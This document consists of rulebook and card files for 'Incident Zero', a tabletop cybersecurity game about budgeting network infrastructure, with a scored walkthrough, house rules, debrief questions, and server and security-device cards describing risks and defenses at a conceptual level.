Phase 2: Operational Event "Vendor Promotion — next security device this turn costs 2 less."

Phase 3: Team Actions "Critical quarter. We're deploying: - Backup Server (9 budget) - IDS at the promo discount (10 − 2 = 8 budget) That satisfies the ransomware requirement. We'll also grab a Cloud Workload (4) for future flexibility. Total: 21 budget. Remaining: 22."

Infrastructure: Web, Database, Backup, IDS, Cloud Workload Budget: 22


TURN 4

Phase 1: Business Requirement "Work-From-Home Program — need remote access capability. Missing: -3 points."

Phase 2: Operational Event "IT Staff Burnout — you may deploy at most ONE component this turn."

Phase 3: Team Actions "We need remote access, and burnout limits us to one deployment. VPN Gateway it is (9 budget). Remaining: 13."

Infrastructure: Web, Database, Backup, IDS, Cloud, VPN Gateway Budget: 13


TURN 5

Phase 1: Business Requirement "Cyber-Insurance Renewal — Backup + Email Gateway + detection: +5 points if all present, -5 if not."

Phase 2: Operational Event "Hardware Recall — pick an on-prem server: pay 3 budget or it's offline this quarter."

Phase 3: Team Actions "We deploy an Email Gateway (6 budget) — with our Backup and IDS that completes the insurance checklist: +5 points. For the recall we pay 3 to keep the Database Server online (it's load-bearing). Total: 9. Remaining: 4."

Infrastructure: Web, Database, Backup, IDS, Cloud, VPN Gateway, Email Gateway Budget: 4


TURN 6 (Final Turn)

Phase 1: Business Requirement "Single Sign-On Rollout — must have a Domain Controller OR lose 5 points."

Phase 2: Operational Event "Quiet Quarter — no incident."

Phase 3: Team Actions "A Domain Controller costs 12; we have 4. We can't buy it. We pass and take the -5 penalty."

Final Infrastructure & Budget Check: - Web Server (7) - Database Server (10) - Backup Server (9) - IDS (10, paid 8 with promo) - Cloud Workload (4) - VPN Gateway (9) - Email Gateway (6) - Recall fee (3) - Total spent: 7+10+9+8+4+9+6+3 = 56 of 60 available (50 start + 10 windfall) - Final Budget: 4 remaining ✓


FINAL SCORING (Walkthrough Team)

Security Score: - IDS: +5 - Email Gateway: +3 - Backup Server: +4 - Total: 12 points

Budget Score: - 4 remaining → 1-4 band - Missed only 1 requirement (no halving) - Total: 15 points

Capability Score: - Web +3, Database +4, Backup +3, VPN +2, Cloud +2 = 14 - No Email service: −5 (an Email Gateway is a security device — it filters mail, it doesn't host mailboxes; they never deployed an Email Server or cloud email) - No Domain Controller: −3 - Total: 6 points

Resilience Score: - Backup Server: +8 - Detection (IDS): +7 - Recovery Plan (backup + detection): +2 - Flat network: −2 - Total: 15 points

Requirement/Event adjustments: - Turn 5 insurance bonus: +5 - Turn 6 missed SSO requirement: −5

FINAL SCORE: 12 + 15 + 6 + 15 + 5 − 5 = 48 points

Lesson: This team survived the ransomware quarter and kept every event in check — but never bought email or identity. Detection and backups scored well; missing core business services bled capability points all game.


Variations & House Rules

Overload Servers (v2.2 — now a STANDARD rule, not a variation)

Servers may exceed capacity at +1 Budget per extra service. This is the same rule as the Network Building module. - Example: 3 services on a 2-capacity server costs +1 budget - Trade-off: cheaper than a new server now, but overloaded servers are recorded risks (single point of failure; events and later modules punish them)

Variation 1: "Upgrade Existing"

Optional Rule: Allow teams to upgrade servers already deployed (swap for a better one, pay the difference). - Example: Replace File Server (6) with Domain Controller (12) — pay 6, keep the hosted services - Creates flexibility but adds complexity

Variation 2: "Disaster Strikes Mid-Game"

Optional Rule (High Difficulty): If EVT-11 (Ransomware Strikes) is drawn and the team has NO Backup Server, they take the -20 immediately AND must deploy a Backup Server by the end of the next turn (mandatory). - Creates an urgent decision point - Teaches that failures have compounding consequences

Variation 3: "Tech Debt"

Optional Rule: Each Legacy System deployed costs 1 extra budget per turn to maintain (not paid upfront). - Teaches that cheap solutions have hidden costs - Creates long-term vs. short-term thinking


Debrief Questions (5-10 minutes)

Strategy Discussion

  1. "What was your infrastructure strategy? Why did you prioritize certain systems?"
  2. "Which trade-off was hardest? (Security vs. Capability vs. Budget)"
  3. "If you could replay, what would you change?"

Learning Connections

  1. "How does this relate to real IT budgeting?"
  2. "What did you learn about balancing security with other concerns?"
  3. "If this network gets attacked (Incident Response module), which vulnerabilities do you see?"

Competitive Reflection

  1. "Why did Team X score higher? What did they do differently?"
  2. "What was the winning strategy?"

Quick Reference Sheets

Scoring Summary (1 page)

NETWORK BUILDING STANDALONE SCORING (v2.2)

SECURITY SCORE (max 30):
  IDS or IPS: +5 | SIEM: +5 | Firewall: +4 | Backup: +4
  Email Gateway: +3 | WAF: +3 | Honeypot: +3 | Segmentation: +3

BUDGET SCORE (max 20) — smart utilization, not hoarding:
  5-15 left: 20 | 1-4 left: 15 | 0 left: 10 | 16-25 left: 10 | 26+ left: 5
  Missed 2+ requirements? Halve it (round down).

CAPABILITY SCORE (max 25):
  Email: +3 | Web: +3 | Database: +4 | File: +2 | Domain: +3
  Dev: +2 | Backup: +3 | VPN: +2 | Cloud: +2 | Honeypot: +1
  Penalties: no Email -5 | no Database -10 | no DC -3
             no VPN (if remote-work card drawn) -3

RESILIENCE SCORE (max 25):
  Backup: +8 | Detection: +7 | Redundancy: +5 | Segmentation: +3
  Recovery Plan (Backup AND Detection): +2
  Penalties: no Backup -10 | single point of failure -5
             no Detection -3 | flat network -2

FINAL = Security + Budget + Capability + Resilience
        − requirement/event penalties (+ bonuses)

Component Quick Reference

SERVERS (Cost / Capacity / Security Profile):
  Email (8/1/Low) | Web (7/1/Low) | Database (10/1/Med)
  File (6/2/Low) | Domain (12/2/Med) | Dev (5/3/Low)
  Backup (9/1/High) | Cloud (4/2/Med) | Legacy (3/1/VLow) | Honeypot (7/1/Med)
  Overload: +1 Budget per service beyond capacity

SECURITY DEVICES (Cost — benefit):
  Firewall (12 — zone control) | IDS (10 — detection) | IPS (14 — detection+blocking)
  Email Gateway (6 — anti-phishing) | WAF (11 — web app defense)
  SIEM (15 — detection+logging) | Segmentation Switch (10 — isolation)
  VPN Gateway (9 — remote access) | Load Balancer (8 — redundancy)
  Honeypot Network (8 — detection/deception)

Ready for Play!

This is a complete, standalone 30-45 minute competitive mini-game.

To run a session: 1. Print server and device cards (cards/network-building/core-deck/) 2. Print the requirement and event decks (cards/network-building/standalone/) 3. Give each team a budget tracker 4. Run 5-7 turns (4-5 min each, per difficulty) 5. Calculate final scores 6. Declare winner 7. 10-minute debrief


v2.2 Playtest Edition Changes

Summary of changes for playtesters:

  1. Difficulty labels unified with the module: Beginner 60 / Standard 50 / Advanced 40 (was "Hard"). More budget = easier.
  2. Any-number actions (v2.2): Phase 3 now allows any number of deployments per turn, matching the module rules; the old "one action" wording contradicted the game's own walkthrough.
  3. Real card decks: Business Requirements (20 cards, REQ-01..REQ-20) and Operational Events (16 cards, EVT-01..EVT-16) now exist as printable files in cards/network-building/standalone/; inline example lists replaced by references to them.
  4. Budget Score redefined around smart utilization: the table now rewards finishing with a 5-15 token contingency reserve and no longer rewards hoarding (the old table gave 20 points for 40+ unspent, while the examples assumed the opposite). Anti-hoarding check added.
  5. Scoring tables recomputed: Security items now sum to the stated max 30; Capability items sum to 25 (Honeypot +1 added — it was in an example but missing from the table); Resilience factors sum to 25 and penalties were rebalanced (no Backup −10). All worked examples now add up.
  6. Worked examples rebuilt: Team A (37) and Team B (28) are clean, verified builds; the 6-turn walkthrough's budget ledger reconciles (56 spent of 60 available, 4 left, score 48). All AI drafting scratch-work removed.
  7. Overload is standard: +1 Budget per extra service beyond capacity — same rule as the module.
  8. Terminology: "VPN Gateway" (was VPN Concentrator), "Backup Server" (was Backup System); device "+1 stat" effects replaced with plain-language benefits tied to the scoring categories.
  9. Component costs verified against the module rules (the canonical source): servers 3-12, devices 6-15.

Incident Zero: Network Building Standalone Mini-Game Infrastructure design competition with multi-dimensional scoring v2.2 - Playtest Edition

cards/network-building/core-deck/server-cards.md

Network Building Module: Server Cards

Version: 2.2 - Playtest Edition Last Updated: July 2026


Overview

Server Cards represent the core computational systems that run your business. Each server has cost (Budget), capacity (how many services it can host), complexity, and security properties that affect network design.


Server Cards

SRV-01: Email Server

Type: Business Critical Cost: 8 Budget Capacity: 1 service Complexity: 2/4 Availability Requirement: 99.9% (almost always needed)

Description: Central email system (Exchange, Postfix, or cloud-based like Office 365). Handles all organizational communication. Commonly targeted by phishing and credential attacks. Must support spam filtering, encryption, and audit logging.

Key Concerns: - Email spoofing and phishing vectors - Credential compromise (email = access to password resets) - Data exfiltration via email attachments and forwarding - High user impact if unavailable

Defense Considerations: - Requires Email Authentication (DMARC/SPF/DKIM) - Benefits from DLP for sensitive email attachments - Gateway filtering for phishing and malware - MFA required for administrative access

Network Placement: DMZ or protected segment (external access required)

Interactions: - Used with Asset Card "Email" - References in Incident Response scenarios (T-01 Phishing, T-11 Browser Extension) - Part of Disaster Recovery "critical services" list


SRV-02: Web Server

Type: Business Critical Cost: 7 Budget Capacity: 1 service Complexity: 2/4 Availability Requirement: 99.5% (critical during business hours)

Description: Public-facing web application server (Apache, Nginx, IIS). Hosts corporate website, customer portal, or SaaS application. Primary attack surface for web exploits (SQL injection, XSS, remote code execution).

Key Concerns: - Web application vulnerabilities (OWASP Top 10) - Unpatched framework or library exploits - DDoS attacks targeting availability - Code injection and remote execution - Data exposure via web interface

Defense Considerations: - Requires WAF (Web Application Firewall) for SQL injection/XSS prevention - IPS for exploit signature detection - Regular patching and vulnerability scanning - Load balancer for availability - TLS/SSL for data in transit

Network Placement: DMZ (external access required, isolated from internal systems)

Interactions: - Used with Asset Card "Web" - References in Incident Response scenarios (T-02 Watering Hole, T-05 Kernel Exploit) - Load balancer reduces single point of failure


SRV-03: Database Server

Type: Business Critical Cost: 10 Budget Capacity: 1 service Complexity: 3/4 Availability Requirement: 99.9% (critical for business operations)

Description: Relational or NoSQL database (SQL Server, PostgreSQL, MongoDB, Oracle). Stores customer data, financial records, operational data. Highest value target after compromise—contains the "crown jewels."

Key Concerns: - SQL injection attacks - Credential abuse (weak database admin passwords) - Lateral movement target (pivot point) - Unencrypted data at rest - Unencrypted data in transit - Unauthorized data access and exfiltration

Defense Considerations: - Requires Network Segmentation to limit access - Credential Guard and strong authentication - Database activity monitoring (DAM) - TLS for all connections - Data encryption at rest - Regular backups with immutability - Connection string in vault (not hardcoded)

Network Placement: Restricted segment (only authorized systems can connect)

Interactions: - Used with Asset Card "Database" - References in Incident Response scenarios (T-04 Lateral Movement, T-10 SQL Exfiltration, T-11 Browser Extension) - Critical for Disaster Recovery backup and recovery


SRV-04: File Server

Type: Business Critical Cost: 6 Budget Capacity: 2 services Complexity: 2/4 Availability Requirement: 99% (needed during business hours)

Description: File storage and sharing system (SMB/CIFS, NFS, or cloud file sharing). Stores shared documents, project files, compliance records. Often contains both sensitive and non-sensitive data mixed together.

Key Concerns: - SMB lateral movement attacks - Excessive file permissions (everyone can read everything) - Ransomware encryption of shares - Unauthorized file access and data theft - Compliance violations (PII, PHI, PCI data stored unencrypted) - Uncontrolled data growth and backup challenges

Defense Considerations: - Network Segmentation to limit SMB access - File permissions auditing and hardening - DLP for sensitive file detection - Immutable snapshots for ransomware recovery - Encryption at rest - Access logging and monitoring

Network Placement: Protected segment (limited internal access only)

Interactions: - Used with Asset Card "File Storage" - Target of T-04 Lateral Movement in Incident Response - Critical dependency for Disaster Recovery


SRV-05: Domain Controller

Type: Business Critical Cost: 12 Budget Capacity: 2 services Complexity: 3/4 Availability Requirement: 99.5% (core infrastructure dependency)

Description: Active Directory or LDAP domain controller. Master repository of all user identities, credentials, and group memberships. Most powerful target in the organization—compromise of DC gives attacker control of entire directory.

Key Concerns: - Credential dumping (Mimikatz targets LSASS on DC) - Pass-the-hash attacks - Unauthorized privilege escalation - DC compromise = organization is fundamentally compromised - Backup DC synchronization complications - Can be both on-premises and cloud (Azure AD)

Defense Considerations: - Credential Guard to protect LSASS - Privileged Access Workstation (PAW) for DC admin access - Strong authentication (MFA) for all DC access - Network Segmentation (DC in restricted tier) - Backup DC in geographically separate location - Regular backup and recovery testing

Network Placement: Restricted segment (admin-only access)

Interactions: - Used with Asset Card "Identity" - Central to Incident Response investigation (T-06 Mimikatz, T-04 Lateral Movement) - DC compromise immediately loses the game (organizational control lost) - Critical for Disaster Recovery restore procedures


SRV-06: Development Server

Type: Business Important Cost: 5 Budget Capacity: 3 services Complexity: 2/4 Availability Requirement: 80% (nice to have, can work around)

Description: Development and testing environment for software development. Lower security requirements than production but often contains production-like data (for testing). Developers need broad access for testing purposes.

Key Concerns: - Overly permissive developer access - Production data in dev (compliance violations) - Outdated/unpatched tools (focus on development, not security) - Lateral movement springboard to production - Code repository contains source code (intellectual property) - Test credentials and API keys hardcoded

Defense Considerations: - Separate dev database from production database (never use prod data) - Firewall rules to prevent dev→prod lateral movement - Code repository security (secrets scanning, access control) - Regular cleanup of test data - MFA for dev server access - Audit logging of developer activities

Network Placement: Development segment (isolated from production)

Interactions: - Used with Asset Card "Development" - Often overlooked security risk (compliance gap in Audit module) - Lateral movement target (attacker compromise dev to move to prod)


SRV-07: Backup Server

Type: Business Critical (Different Tier) Cost: 9 Budget Capacity: 1 service Complexity: 2/4 Availability Requirement: 95% (needed for recovery scenarios)

Description: Backup and archival storage system (dedicated appliance, NAS, or cloud backup like Veeam, Commvault, or Backblaze). Stores point-in-time copies of all critical systems. The ultimate recovery mechanism for ransomware, disasters, and destructive attacks.

Key Concerns: - Backup corruption or compromise (renders backups useless) - Ransomware targeting backup systems - Backup media not separated from primary systems - Backups not regularly tested (recovery fails when needed) - Immutability not enforced (backups can be modified) - Access control: who can restore? Who can delete?

Defense Considerations: - CRITICAL: 3-2-1 backup strategy: 3 copies, 2 media types, 1 offsite - Immutable backups (WORM - Write Once Read Many) - Encryption at rest and in transit - Backup testing schedule (quarterly minimum) - Separate backup credentials (not domain-linked) - Offsite backup location (geographically separated) - Backup media inventory and audit log

Network Placement: Restricted segment + offsite (separate from primary network)

Interactions: - Used with Asset Card "Disaster Recovery" - Critical for Disaster Recovery module (backup resilience determines recovery speed) - If backup is missing or compromised, the team automatically FAILS the Disaster Recovery requirement (v2.2) — a CRITICAL gap carried into other modules - Incident Response mentions backup verification in defenses


SRV-08: Cloud Workload

Type: Increasingly Business Critical Cost: 4 Budget Capacity: 2 services Complexity: 2/4 (but different concerns than on-premises) Availability Requirement: 99% (vendor manages SLA)

Description: Cloud-hosted application or service (AWS EC2, Azure VM, GCP Compute Engine, or fully managed service like Lambda, Cloud Run). Shifts some infrastructure management to cloud provider but introduces new security concerns.

Key Concerns: - Misconfigured security groups/network ACLs (open to internet) - Cloud credentials compromise (AWS IAM keys stolen) - Instance metadata service attacks (AWS IMDS exploitation) - Cross-account or cross-tenant access (shared infrastructure) - Cloud-specific vulnerabilities (API, permissions models) - Data residency and compliance (where is data stored?)

Defense Considerations: - Cloud-native security tools (AWS Security Hub, Azure Security Center) - Proper IAM configuration (least privilege for cloud roles) - Network security groups with default-deny - Cloud workload protection (container runtime security) - VPC and subnet isolation - Encryption of cloud data

Network Placement: Cloud provider network (separate from on-premises, connected via VPN)

Interactions: - Used with Asset Card (varies—Email in cloud, Web in cloud, etc.) - Network design must include cloud connectivity (VPN or Direct Connect) - Audit module assesses cloud security posture - Cloud-specific Incident Response and Hardening challenges


SRV-09: Legacy System

Type: Business Important (Legacy) Cost: 3 Budget Capacity: 1 service Complexity: 3/4 (difficult to maintain, patch, or secure) Availability Requirement: 90% (supported but aging)

Description: Aging system running outdated OS (Windows XP, older Linux, proprietary systems) or custom applications. Cannot be easily patched due to compatibility issues, vendor no longer supporting, or critical business process depends on it.

Key Concerns: - Cannot patch due to vendor EOL (End of Life) - Incompatible with modern security tools (EDR won't run) - No TLS support (unencrypted traffic) - Known, publicly disclosed vulnerabilities with no fix - Business relies on it despite security risk - Migration cost exceeds security benefit (economically trapped)

Defense Considerations: - CRITICAL: Network Segmentation isolates legacy system - Firewall rules restrict legacy system traffic - Assume compromise and defend the segmented network (not the legacy system itself) - Monitor legacy system for suspicious activity (can't detect on system, detect on network) - Immutable backups to restore if compromised - Plan legacy system retirement

Network Placement: Isolated segment (strict firewall rules, minimal connectivity)

Interactions: - Used if organization has legacy infrastructure - Audit module finds legacy systems as critical findings - Network design: "assume legacy is compromised, defend around it" - Expansion deck explores legacy system challenges


SRV-10: Honeypot Decoy

Type: Security Tool (Non-Business) Cost: 7 Budget Capacity: 1 service (decoy only — hosts no real business service) Complexity: 1/4 (purposefully simple and unmonitored-looking) Availability Requirement: N/A (false resource)

Description: Deliberately exposed fake server or user account designed to detect compromise and lateral movement. Appears to be a real business resource but is actually a trap. Any access to honeypot indicates active attacker activity (zero false positives).

Key Concerns: - Placement visibility (attacker must discover it to trigger it) - Believability (must look like real system worth attacking) - Monitoring (honeypot access must be logged securely) - Honeypot maintenance (must not appear unmaintained) - Response procedures (what do we do when honeypot is triggered?)

Defense Considerations: - Canary tokens (watermarked documents, fake credentials) - Fake administrative account (admin account that isn't really admin) - Fake file server with sensitive-looking shares - Fake VIP email addresses on mailing lists - Alerting on any access to honeypot (immediate incident response)

Network Placement: Among legitimate resources (cannot appear isolated)

Interactions: - Used with Deception Technology defense card in Hardening - Network design: "place honeypots where attackers will likely look" - Zero false positives: any honeypot access = real attack - Expansion deck discusses advanced honeypot strategies


Server Card Summary

Card Server Type Cost Capacity Complexity Availability Key Risk
SRV-01 Email Server 8 1 2/4 99.9% Phishing, Credential Abuse
SRV-02 Web Server 7 1 2/4 99.5% Web Exploits, RCE
SRV-03 Database Server 10 1 3/4 99.9% SQL Injection, Data Exfil
SRV-04 File Server 6 2 2/4 99% SMB Laterals, Ransomware
SRV-05 Domain Controller 12 2 3/4 99.5% Mimikatz, Complete Compromise
SRV-06 Development 5 3 2/4 80% Lateral Movement, Data Leak
SRV-07 Backup Server 9 1 2/4 95% Ransomware, Recovery Failure
SRV-08 Cloud Workload 4 2 2/4 99% Misconfiguration, IAM Abuse
SRV-09 Legacy System 3 1 3/4 90% Known Vulns, Cannot Patch
SRV-10 Honeypot 7 1 1/4 N/A Detection, Early Warning

Gameplay Notes

Budget Considerations

Capacity & Overload (v2.2)

Complexity Considerations

Business Requirement Mapping

Each server fulfills one or more Asset Card requirements: - SRV-01 → Asset "Email" - SRV-02 → Asset "Web" - SRV-03 → Asset "Database" - SRV-04 → Asset "File Storage" - SRV-05 → Asset "Identity" - SRV-06 → Asset "Development" - SRV-07 → Asset "Disaster Recovery" - SRV-08 → Asset (varies—could be Email, Web, Database in cloud) - SRV-09 → Asset (legacy system supporting specific business function) - SRV-10 → Security monitoring (not a business requirement)


Print Instructions

  1. Print on cardstock (250 gsm minimum)
  2. Color-code by business criticality:
  3. Red: SRV-03, SRV-05, SRV-07 (Business Critical - cannot lose)
  4. Yellow: SRV-01, SRV-02, SRV-04 (Important - high impact if down)
  5. Blue: SRV-06, SRV-08, SRV-09 (Business Important - can work around)
  6. Green: SRV-10 (Security Tool - special purpose)
  7. Cut along dotted lines
  8. Consider creating a separate "Server Reference Card" with costs, capacity, and complexity for quick lookup

Network Building Module: Server Cards Part of Incident Zero, a modular cybersecurity board game v2.2 - Playtest Edition

cards/network-building/core-deck/security-device-cards.md

Network Building Module: Security Device Cards

Version: 2.2 - Playtest Edition Last Updated: July 2026


Overview

Security Device Cards represent network security appliances and tools that control traffic, detect threats, and enforce policies between network segments.


Security Device Cards

SEC-01: Firewall (Perimeter)

Type: Perimeter Control Cost: 12 Budget Placement: Network edge (between internet and internal network) Primary Function: Block unauthorized inbound/outbound traffic

Description: Traditional stateful firewall (Cisco ASA, Palo Alto Networks, Fortinet FortiGate) at network perimeter. Enforces allow/deny rules based on source IP, destination IP, protocol, and port. First line of defense against external attacks.

What It Protects Against: - Unauthorized inbound access attempts - Unauthorized outbound connections (C2 beaconing, data exfiltration) - Network reconnaissance from internet - DDoS attacks (basic flood protection)

What It Doesn't Protect Against: - Application-layer attacks (SQL injection, XSS) - Lateral movement within network (operates at L3/L4 only) - Encrypted traffic inspection (needs deep packet inspection) - Insider threats or authorized-but-malicious access

Network Interactions: - Required for: Most organizations (perimeter protection is baseline) - Works with: Web Server (must allow inbound HTTP/HTTPS), Email Server (SMTP/POP3/IMAP) - Supports: Database (prevents inbound database connections from internet)

Ruleset Complexity: Medium (5-10 rules for basic setup, 50+ for mature organization)

Performance Impact: Minimal for small networks, can become bottleneck at scale


SEC-02: Intrusion Detection System (IDS)

Type: Threat Detection Cost: 10 Budget Placement: Internal network (behind firewall, in front of critical systems) Primary Function: Detect suspicious network traffic patterns

Description: Network-based IDS (Snort, Zeek, Suricata) that inspects all traffic and alerts on suspicious patterns. Uses signature matching and/or behavioral analysis to identify known attacks and anomalous traffic.

What It Protects Against: - Known attack patterns (exploits, vulnerability scans) - Port scanning and reconnaissance - Lateral movement (SMB, RDP abuse) - Data exfiltration patterns (unusual volume, unusual destination) - Command & Control (C2) communication

What It Doesn't Protect Against: - Zero-day exploits (no signature exists) - Encryption inspection (needs decryption) - Insider threats (authorized users on authorized systems) - Application-layer attacks (SQL injection, XSS still pass through)

Network Interactions: - Works with: SIEM (IDS alerts feed into SIEM for correlation) - Supports: Detection of T-04 (Lateral Movement), T-09 (C2 Beaconing) in Incident Response - Complements: IPS (IDS detects, IPS blocks; often paired)

Signature Maintenance: High (requires weekly/daily signature updates from threat intelligence)

Performance Impact: Medium (packet inspection adds latency, can slow network)


SEC-03: Intrusion Prevention System (IPS)

Type: Threat Prevention Cost: 14 Budget Placement: Internal network (actively blocks malicious traffic) Primary Function: Block suspicious traffic in real-time

Description: Network-based IPS (actively protective version of IDS). Can block traffic in addition to alerting. Inline placement allows real-time threat blocking.

What It Protects Against: - Everything IDS protects against (detection + blocking) - Exploit attempts against known vulnerabilities - Worm propagation - Policy violations

What It Doesn't Protect Against: - Same limitations as IDS, plus: - False positive blocking (can block legitimate traffic) - Encrypted traffic inspection limitations - Zero-day exploits

Network Interactions: - Works with: WAF on web traffic (IPS for network, WAF for applications) - Works with: Firewall (layered network defense) - Supports: Defense against T-02 (Watering Hole), T-05 (Kernel Exploit) in Incident Response

Tuning Complexity: High (false positives require tuning; too aggressive = blocks legitimate traffic)

Performance Impact: Medium-High (real-time inspection + blocking adds latency)

Risk: Misconfigured IPS can block critical business traffic


SEC-04: Load Balancer

Type: Availability & Performance Cost: 8 Budget Placement: In front of multiple web servers Primary Function: Distribute traffic across multiple servers

Description: Load balancer (F5, Citrix NetScaler, nginx, HAProxy) distributes incoming traffic across multiple backend servers. Increases availability and performance.

What It Protects Against: - Single server failure (if one web server fails, traffic routes to others) - DDoS attacks (distributes attack traffic across multiple servers) - Overload attacks (can queue excess requests)

What It Doesn't Protect Against: - Application vulnerabilities - Malicious traffic targeting multiple backends - Session hijacking - Backend compromise (load balancer can't protect compromised backend)

Network Interactions: - Requires: Web Server (needs multiple instances for load balancing to make sense) - Works with: Web Server redundancy (2+ web servers behind load balancer) - Supports: Web application availability in Incident Response scenarios

Health Check Mechanism: Monitors backend servers; removes unhealthy servers automatically

Cost-Benefit: Low cost (8 Budget) but high value if you have multiple web servers


SEC-05: VPN Gateway

Type: Remote Access Control Cost: 9 Budget Placement: Network perimeter (between internet and internal network) Primary Function: Secure remote access for employees/contractors

Description: VPN concentrator (Cisco AnyConnect, Palo Alto Prisma Access, F5 BIG-IP) that creates encrypted tunnels for remote users. Allows employees to securely access internal resources from outside network.

What It Protects Against: - Man-in-the-middle attacks on remote user traffic - Credential interception (traffic encrypted) - Unauthorized access to internal resources (authentication required) - IP spoofing (tunnel validates source)

What It Doesn't Protect Against: - Weak VPN credentials (still vulnerable to brute force) - Compromised endpoint connecting via VPN (malware on home computer) - Insider threats (authorized user with legitimate credentials) - Application vulnerabilities accessed through VPN

Network Interactions: - Works with: Domain Controller (VPN user auth) - Works with: MFA (VPN should require MFA) - Supports: Remote work scenarios (necessary for distributed teams)

Authentication Complexity: Requires MFA for security (otherwise easy brute force)

Cost-Benefit: Necessary for remote work, but alone insufficient (needs MFA)


SEC-06: Email Gateway

Type: Email Security Cost: 6 Budget Placement: Network perimeter (filters incoming/outgoing email) Primary Function: Filter spam, phishing, and malware in email

Description: Email security appliance (Proofpoint, Mimecast, Cisco Email Security) that filters all incoming/outgoing email. Scans for phishing, malware, data exfiltration attempts.

What It Protects Against: - Phishing emails (signature and behavior-based detection) - Email-based malware (attachments, links) - Spam (reduces alert fatigue) - Data exfiltration via email (DLP for email) - Email spoofing (validates SPF/DKIM/DMARC)

What It Doesn't Protect Against: - User clicks on phishing links (user training needed) - Advanced phishing with legitimate credentials - Compromised internal email account sending from inside - Zero-day malware in attachments

Network Interactions: - Works with: Email Server (filters before reaching server) - Works with: User Security Training (filters + training = defense-in-depth) - Supports: Defense against T-01 (Phishing) in Incident Response

Signature Maintenance: Very high (email threats change daily)

User Experience Impact: Email delays (milliseconds) are imperceptible; false positives = missed emails


SEC-07: Web Application Firewall (WAF)

Type: Application-Layer Protection Cost: 11 Budget Placement: In front of web server Primary Function: Block application-layer attacks (SQL injection, XSS, etc.)

Description: Web Application Firewall (ModSecurity, Cloudflare WAF, AWS WAF) that inspects HTTP traffic and blocks malicious payloads. Understands web application protocols unlike traditional firewall.

What It Protects Against: - SQL injection attacks - Cross-site scripting (XSS) - Cross-site request forgery (CSRF) - Remote code execution (RCE) - Malicious file uploads - Buffer overflows in web apps

What It Doesn't Protect Against: - Logic flaws in application (WAF can't fix broken business logic) - Authenticated attacks (user is authorized) - Distributed attacks across many IPs (WAF can't distinguish) - Zero-day application vulnerabilities (no rule exists)

Network Interactions: - Requires: Web Server (only protects web traffic) - Works with: IPS (network-level and application-level defense) - Supports: Defense against T-02 (Watering Hole) in Incident Response

Rule Maintenance: Medium (OWASP rules are standardized, vendor maintains them)

False Positive Rate: Medium (needs tuning for specific web application)

Performance Impact: Medium (application inspection adds latency)


SEC-08: Network Segmentation Switch

Type: Network Architecture Control Cost: 10 Budget Placement: Internal network (between segmented network zones) Primary Function: Enforce network segmentation via VLANs and ACLs

Description: Layer 3 switch or router configured for network segmentation. Implements VLANs (virtual LANs) and layer 3 filtering to separate network into zones (DMZ, User segment, Server segment, Admin segment).

What It Protects Against: - Lateral movement via SMB and other internal protocols - Credential dumping spread (isolated networks can't reach DCs) - Compromised user system accessing servers directly - Insider threats (restrictions on data access) - Data exfiltration to external media (if USB segment is isolated)

What It Doesn't Protect Against: - Attacks within same segment (switch can't prevent user↔user attacks) - Routing around segmentation (if misconfigured) - Physical network attacks (layer 1 problems) - Encrypted tunneling out of segment (if firewall rule allows)

Network Interactions: - Works with: Firewall (firewall rules enforce segmentation policies) - Works with: Database Server (database in isolated segment) - Works with: Zero Trust (segmentation is prerequisite for zero trust) - Supports: Defense against T-04 (Lateral Movement) in Incident Response

Configuration Complexity: High (requires planning of segment boundaries and rules)

Cost-Benefit: Very high ROI (prevents lateral movement for 10 Budget)


SEC-09: SIEM (Security Information & Event Management)

Type: Threat Monitoring & Investigation Cost: 15 Budget Placement: Central monitoring (logs from all devices) Primary Function: Aggregate logs and detect threats via correlation

Description: Enterprise SIEM (Splunk, Elastic, QRadar, ArcSight) that collects logs from all systems, correlates events, and alerts on suspicious patterns. Foundation of mature incident response program.

What It Protects Against: - Multi-step attack patterns (correlation finds chains) - Persistence mechanisms (scheduled tasks, registry changes logged) - Credential abuse (failed login spikes) - Insider threats (excessive file access, off-hours activity) - Data exfiltration (unusual volume to unusual destination)

What It Doesn't Protect Against: - Attacks happening faster than SIEM ingests logs - False negatives (misconfigured rules miss attacks) - Encrypted traffic inspection (needs decryption) - Malware on endpoint (needs EDR, not SIEM)

Network Interactions: - Requires: Log Centralization deployment (needs logs to analyze) - Works with: IDS/IPS alerts (SIEM correlates with network alerts) - Supports: Incident Response investigation (SIEM data essential for forensics) - Critical for: Hardening module detection (SIEM detects Pentester Tactics)

Data Requirements: Massive (can be 10+ GB/day for large organizations)

Maintenance: Very high (tuning rules, managing data retention, responding to false positives)

Value: Essential for organizations that need incident detection


SEC-10: Honeypot Network

Type: Deception & Detection Cost: 8 Budget Placement: Isolated segment (mimics legitimate infrastructure) Primary Function: Detect lateral movement and reconnaissance

Description: Network of decoy systems (not SRV-10 honeypot server, but entire segment) designed to attract attackers. Any access to honeypot network indicates active attacker.

What It Protects Against: - Lateral movement (attacker triggers honeypot while exploring) - Network reconnaissance (if honeypot is discovered) - Ransomware spread (if honeypot is in ransomware path) - Insider reconnaissance (any access to honeypot = red flag)

What It Doesn't Protect Against: - Attacks that don't trigger honeypot (if attacker follows direct path) - Honeypot visibility (attacker must find it to trigger it) - False positives (must be designed to avoid accidental triggers)

Network Interactions: - Works with: Network Segmentation (honeypot in isolated but accessible segment) - Works with: SIEM (honeypot triggers feed into SIEM) - Supports: Detection in Hardening module (Deception Technology defense)

Maintenance: Medium (must keep honeypot looking alive and attractive)

Cost-Benefit: Low cost (8 Budget) with high detection value (zero false positives)


Security Device Summary

Card Device Type Cost Primary Vectors Placement
SEC-01 Firewall (Perimeter) 12 NETWORK, CREDENTIAL Perimeter
SEC-02 IDS 10 MALWARE, NETWORK Internal
SEC-03 IPS 14 MALWARE, WEB, NETWORK Internal
SEC-04 Load Balancer 8 NETWORK (availability) Web Tier
SEC-05 VPN Gateway 9 CREDENTIAL, NETWORK Perimeter
SEC-06 Email Gateway 6 SOCIAL_ENG, MALWARE Perimeter
SEC-07 WAF 11 WEB, MALWARE Web Tier
SEC-08 Network Segmentation 10 CREDENTIAL, NETWORK Internal
SEC-09 SIEM 15 Multiple (detection) Central
SEC-10 Honeypot Network 8 NETWORK (detection) Isolated

Cost-Benefit Analysis

Tier 1 (Essential for Any Organization)

Tier 2 (Advanced Organizations)

Tier 3 (Specialized Protections)


Gameplay Strategy Notes (v2.2)

Budgets are 40-60 by difficulty (Beginner 60 / Standard 50 / Advanced 40), and the Required servers eat most of it — plan security spending around what's left.

Beginner (Budget: 60)

Standard (Budget: 50)

Advanced (Budget: 40)


Print Instructions

  1. Print on cardstock (250 gsm minimum)
